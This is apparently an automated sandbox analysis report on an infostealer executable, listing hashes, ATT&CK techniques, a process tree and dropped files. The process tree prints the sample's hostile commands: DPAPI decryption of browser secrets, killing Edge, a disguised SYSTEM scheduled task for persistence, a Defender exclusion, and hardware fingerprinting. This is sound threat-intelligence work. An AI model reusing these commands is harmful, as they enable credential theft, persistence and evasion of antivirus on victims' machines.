7afdfc51e20e5f336761b4a1964a8949428dff7b96ea8389c4db9383afe2e336

Analysis

max time kernel
15s
max time network
22s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
11/05/2024, 07:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
Size

37.6MB
MD5

dbcc5cfb5b91fae4370930affd3d7ef9
SHA1

5e5598375c5abeee8c18c9c28a5138e3763df29b
SHA256

6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef
SHA512

0b66dbb037c5e30a451732403d5e0f278588bf78d4c12d660b75f53713f05e233bb5785942155f5dab88ecb92edc789c8b583621077077f7bee1b56f20dc8584
SSDEEP

393216:RQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mg196l+ZArYsFRlQ6x:R3on1HvSzxAMN1FZArYsDPv47OZRqIx

Score

8^/10

execution spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2128	powershell.exe
5036	powershell.exe
4192	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe

Loads dropped DLL 1 IoCs

pid	Process
4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	api.ipify.org

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
2572	cmd.exe
4448	cmd.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
452	schtasks.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
2988	tasklist.exe
3356	tasklist.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2424	taskkill.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
5036	powershell.exe
5036	powershell.exe
1492	powershell.exe
1492	powershell.exe
2160	powershell.exe
2160	powershell.exe
2128	powershell.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

description	pid	Process
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeDebugPrivilege	2988	tasklist.exe
Token: SeDebugPrivilege	2424	taskkill.exe
Token: SeDebugPrivilege	3356	tasklist.exe
Token: SeDebugPrivilege	1492	powershell.exe
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeDebugPrivilege	2128	powershell.exe
Token: SeIncreaseQuotaPrivilege	4584	WMIC.exe
Token: SeSecurityPrivilege	4584	WMIC.exe
Token: SeTakeOwnershipPrivilege	4584	WMIC.exe
Token: SeLoadDriverPrivilege	4584	WMIC.exe
Token: SeSystemProfilePrivilege	4584	WMIC.exe
Token: SeSystemtimePrivilege	4584	WMIC.exe
Token: SeProfSingleProcessPrivilege	4584	WMIC.exe
Token: SeIncBasePriorityPrivilege	4584	WMIC.exe
Token: SeCreatePagefilePrivilege	4584	WMIC.exe
Token: SeBackupPrivilege	4584	WMIC.exe
Token: SeRestorePrivilege	4584	WMIC.exe
Token: SeShutdownPrivilege	4584	WMIC.exe
Token: SeDebugPrivilege	4584	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4584	WMIC.exe
Token: SeRemoteShutdownPrivilege	4584	WMIC.exe
Token: SeUndockPrivilege	4584	WMIC.exe
Token: SeManageVolumePrivilege	4584	WMIC.exe
Token: 33	4584	WMIC.exe
Token: 34	4584	WMIC.exe
Token: 35	4584	WMIC.exe
Token: 36	4584	WMIC.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 4344 wrote to memory of 4676	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	92
PID 4344 wrote to memory of 4676	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	92
PID 4676 wrote to memory of 1436	4676	cmd.exe	93
PID 4676 wrote to memory of 1436	4676	cmd.exe	93
PID 4676 wrote to memory of 5036	4676	cmd.exe	94
PID 4676 wrote to memory of 5036	4676	cmd.exe	94
PID 5036 wrote to memory of 512	5036	powershell.exe	95
PID 5036 wrote to memory of 512	5036	powershell.exe	95
PID 512 wrote to memory of 2260	512	csc.exe	96
PID 512 wrote to memory of 2260	512	csc.exe	96
PID 4344 wrote to memory of 4336	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	97
PID 4344 wrote to memory of 4336	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	97
PID 4344 wrote to memory of 3088	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	98
PID 4344 wrote to memory of 3088	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	98
PID 3088 wrote to memory of 2988	3088	cmd.exe	100
PID 3088 wrote to memory of 2988	3088	cmd.exe	100
PID 4336 wrote to memory of 4188	4336	cmd.exe	99
PID 4336 wrote to memory of 4188	4336	cmd.exe	99
PID 4344 wrote to memory of 756	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	102
PID 4344 wrote to memory of 756	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	102
PID 756 wrote to memory of 2424	756	cmd.exe	103
PID 756 wrote to memory of 2424	756	cmd.exe	103
PID 4344 wrote to memory of 2228	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	104
PID 4344 wrote to memory of 2228	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	104
PID 4344 wrote to memory of 2572	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	105
PID 4344 wrote to memory of 2572	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	105
PID 2228 wrote to memory of 3356	2228	cmd.exe	106
PID 2228 wrote to memory of 3356	2228	cmd.exe	106
PID 2572 wrote to memory of 1492	2572	cmd.exe	107
PID 2572 wrote to memory of 1492	2572	cmd.exe	107
PID 4344 wrote to memory of 4448	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	108
PID 4344 wrote to memory of 4448	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	108
PID 4448 wrote to memory of 2160	4448	cmd.exe	109
PID 4448 wrote to memory of 2160	4448	cmd.exe	109
PID 4344 wrote to memory of 1812	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	110
PID 4344 wrote to memory of 1812	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	110
PID 4344 wrote to memory of 4512	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	111
PID 4344 wrote to memory of 4512	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	111
PID 4344 wrote to memory of 3908	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	112
PID 4344 wrote to memory of 3908	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	112
PID 4344 wrote to memory of 1976	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	113
PID 4344 wrote to memory of 1976	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	113
PID 1976 wrote to memory of 2128	1976	cmd.exe	114
PID 1976 wrote to memory of 2128	1976	cmd.exe	114
PID 1812 wrote to memory of 4584	1812	cmd.exe	116
PID 1812 wrote to memory of 4584	1812	cmd.exe	116
PID 4344 wrote to memory of 4756	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	117
PID 4344 wrote to memory of 4756	4344	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	117

C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
"C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
    3⤵
    PID:1436
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -noprofile -
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5036
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w0mmhcwn\w0mmhcwn.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:512
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES341B.tmp" "c:\Users\Admin\AppData\Local\Temp\w0mmhcwn\CSC818140766A5C469DBC3C62159FB5524.TMP"
        5⤵
        
        PID:2260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4336
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3088
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:2988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:756
- - C:\Windows\system32\taskkill.exe
    taskkill /IM msedge.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2228
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:3356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,241,92,66,174,187,6,38,209,193,142,166,116,244,248,31,73,3,124,122,132,249,215,184,221,61,142,63,81,31,235,133,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,131,228,65,214,200,163,167,4,113,222,37,206,252,183,179,243,139,246,96,173,127,6,13,187,15,183,207,98,67,208,33,241,48,0,0,0,149,231,106,81,112,102,41,127,125,162,67,100,183,39,147,134,104,182,155,155,80,150,49,84,30,123,115,253,164,30,208,57,168,236,10,216,222,207,149,153,9,220,3,233,51,202,182,161,64,0,0,0,165,23,67,63,92,175,41,154,37,17,89,91,54,206,178,76,58,178,32,96,55,61,68,213,172,26,220,113,216,72,144,138,217,131,17,196,132,54,25,154,207,53,11,7,244,44,83,247,206,53,182,251,206,70,40,32,195,82,216,215,113,156,204,19), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:2572
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,241,92,66,174,187,6,38,209,193,142,166,116,244,248,31,73,3,124,122,132,249,215,184,221,61,142,63,81,31,235,133,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,131,228,65,214,200,163,167,4,113,222,37,206,252,183,179,243,139,246,96,173,127,6,13,187,15,183,207,98,67,208,33,241,48,0,0,0,149,231,106,81,112,102,41,127,125,162,67,100,183,39,147,134,104,182,155,155,80,150,49,84,30,123,115,253,164,30,208,57,168,236,10,216,222,207,149,153,9,220,3,233,51,202,182,161,64,0,0,0,165,23,67,63,92,175,41,154,37,17,89,91,54,206,178,76,58,178,32,96,55,61,68,213,172,26,220,113,216,72,144,138,217,131,17,196,132,54,25,154,207,53,11,7,244,44,83,247,206,53,182,251,206,70,40,32,195,82,216,215,113,156,204,19), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,217,63,211,151,50,59,23,14,157,120,173,214,75,168,44,4,86,215,197,221,15,211,57,168,170,96,26,224,123,202,176,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,18,94,83,33,10,127,43,207,118,25,163,52,85,137,171,176,54,29,140,152,151,60,207,249,173,64,112,136,115,160,201,198,48,0,0,0,128,39,129,224,38,93,129,6,223,202,165,111,102,236,160,251,177,38,22,194,235,129,171,61,192,137,129,16,112,252,72,62,10,204,202,185,244,12,160,149,156,225,125,30,180,211,209,177,64,0,0,0,217,129,143,47,147,156,214,93,117,216,121,231,75,189,241,110,215,1,53,65,179,41,61,227,177,21,51,235,139,102,59,83,7,39,162,98,116,173,160,235,7,227,134,248,109,167,4,20,209,189,188,85,142,159,80,126,61,15,85,255,177,30,169,242), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:4448
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,217,63,211,151,50,59,23,14,157,120,173,214,75,168,44,4,86,215,197,221,15,211,57,168,170,96,26,224,123,202,176,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,18,94,83,33,10,127,43,207,118,25,163,52,85,137,171,176,54,29,140,152,151,60,207,249,173,64,112,136,115,160,201,198,48,0,0,0,128,39,129,224,38,93,129,6,223,202,165,111,102,236,160,251,177,38,22,194,235,129,171,61,192,137,129,16,112,252,72,62,10,204,202,185,244,12,160,149,156,225,125,30,180,211,209,177,64,0,0,0,217,129,143,47,147,156,214,93,117,216,121,231,75,189,241,110,215,1,53,65,179,41,61,227,177,21,51,235,139,102,59,83,7,39,162,98,116,173,160,235,7,227,134,248,109,167,4,20,209,189,188,85,142,159,80,126,61,15,85,255,177,30,169,242), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1812
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic diskdrive get serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
  2⤵
  PID:4512
- - C:\Windows\system32\reg.exe
    reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
    3⤵
    PID:4452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
  2⤵
  PID:3908
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
    3⤵
    - Creates scheduled task(s)
    PID:452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1976
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2128
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mctnrend\mctnrend.cmdline"
      4⤵
      PID:3808
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4D11.tmp" "c:\Users\Admin\AppData\Local\Temp\mctnrend\CSCF38C7E581E3047888C51AE4E1E55E0A7.TMP"
        5⤵
        
        PID:2448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4756
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
  2⤵
  PID:1368
- - C:\Windows\system32\cscript.exe
    cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
    3⤵
    PID:4548
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
      4⤵
      PID:2884
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
  2⤵
  PID:2776
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic baseboard get serialnumber
    3⤵
    PID:1712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:5036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:1396
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:1752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
  2⤵
  PID:2876
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_computersystemproduct get uuid
    3⤵
    PID:1796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell wininit.exe"
  2⤵
  PID:836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell wininit.exe
    3⤵
    PID:2516
  - - C:\Windows\system32\wininit.exe
      "C:\Windows\system32\wininit.exe"
      4⤵
      PID:2768

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

Filesize
1KB

MD5
93f90bda499e44e7497ed86627232b18

SHA1
711d3ed2e1d427dd6633ac3f1f258382694ac050

SHA256
e396e532af9adbdce7bf1f018313422779f32e750bc8193131525922334821c2

SHA512
edc2522ce9afef5bbaf9b89990ecb0913fe5d033979c1015682aa2fecde84bf4d757a484d744cf1bad78904e512b9b9632f3beedba1a743a13719216b0adfb4f

Download Submit
C:\ProgramData\edge\Updater\Get-Clipboard.ps1

Filesize
3KB

MD5
a8834c224450d76421d8e4a34b08691f

SHA1
73ed4011bc60ba616b7b81ff9c9cad82fb517c68

SHA256
817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5

SHA512
672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

Download Submit
C:\ProgramData\edge\Updater\RunBatHidden.vbs

Filesize
146B

MD5
14a9867ec0265ebf974e440fcd67d837

SHA1
ae0e43c2daf4c913f5db17f4d9197f34ab52e254

SHA256
cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1

SHA512
36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3f01549ee3e4c18244797530b588dad9

SHA1
3e87863fc06995fe4b741357c68931221d6cc0b9

SHA256
36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

SHA512
73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
46d6c89b6a449ce91c1a3691c516e10e

SHA1
dedf2c05d83a8fc311e39fa86af575866f9f7ece

SHA256
f6841440d2949cf97fb621923a2f931fca567382856cb60fa4c8ce3f9b81e55f

SHA512
bd222cc430c28abe832787973ed2a7a07d58d92f34eed1ebfe69fc4cd8ed59443ed93799979fd39d1b76ef6ff247f3ceb12b3c537de09ffba72ebec748f3e1cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
40ea760a8d4100ec0132da07107f9cab

SHA1
0b4c1dee23c6634bb6f8aa898929e7008959c5ce

SHA256
8c233cf826eaa081640bde9ee53964cf0997a9cbdb6c0b4f8a0dbe29da2458f0

SHA512
e136f8d523c040e75255702803021566da0f84b810b27ca48f663e2d83e803e9a9234d285e8ae39c5adab9546312dd6462d0d0d3f94876970c61e1f3c269077e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES341B.tmp

Filesize
1KB

MD5
6bb13bcb668522531e12b8aa780989f2

SHA1
13d46ee674ef257f93c43b4c229e66cf35a03167

SHA256
ab4d0308827df69bcae352d77b23a5de47915734d2e279118068597a4c8ec53a

SHA512
d3a58aa9654e7180e633fdf4242bdaca48f835a1bb1b3344f1c17d397bb75e7b0a85f4b086991f55b3407873d7d00924522087b066affd88e9942b5912967de0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4D11.tmp

Filesize
1KB

MD5
050b5340324990343d83d43f32b58348

SHA1
fdc7e34990046a1f043dcff942fd57cfef8078d4

SHA256
8305dab8650041e8863245b5500339e23e8d09fc0ef4e66802276f37f4c1a79c

SHA512
037505c00b9a6f34f292a87b9292e13e4c7f0c37dc8fec17a582717eb489cc1462da28f0351f5014e9c9ce72fc5cd8183f75d92e4887e866d02eada1bd64e2ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2pujn1gv.a2s.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\mctnrend\mctnrend.dll

Filesize
3KB

MD5
9e56d110863764bf3028af3b9a92f23e

SHA1
037de48073f1fbbccff72ddd01156ab4e0e2a283

SHA256
d78318afa5a89b0002e39cc49dd84081aeccc30883f03ba575e2e955abe31192

SHA512
d122360fc968fc47577d1a691a87d077de9a6cf7133db2be75e73be7054a5e0221dd35dfb284940187b956dbbace56a2cdd3240f4d2517829d13ba6690250806

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.ps1

Filesize
379B

MD5
18047e197c6820559730d01035b2955a

SHA1
277179be54bba04c0863aebd496f53b129d47464

SHA256
348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3

SHA512
1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

Download Submit
C:\Users\Admin\AppData\Local\Temp\w0mmhcwn\w0mmhcwn.dll

Filesize
3KB

MD5
eb58dbe03d1b93d8a96c67783f53dd26

SHA1
9f15357b4878d633e8b2f2d796c39701212ce63e

SHA256
19056ffa65c9bbf1a1cf936d7c5334d5ca809f4124f2f5c5f75d8cdfab22af07

SHA512
dd26df0ae30a212b4ce214ca0438f96f9f7a54c446aa89ad22a687af426c2e3b785f0ef3d2e987ceb6474fae8b7aa18f85fec7a81e613a36624a231a25e23ddd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mctnrend\CSCF38C7E581E3047888C51AE4E1E55E0A7.TMP

Filesize
652B

MD5
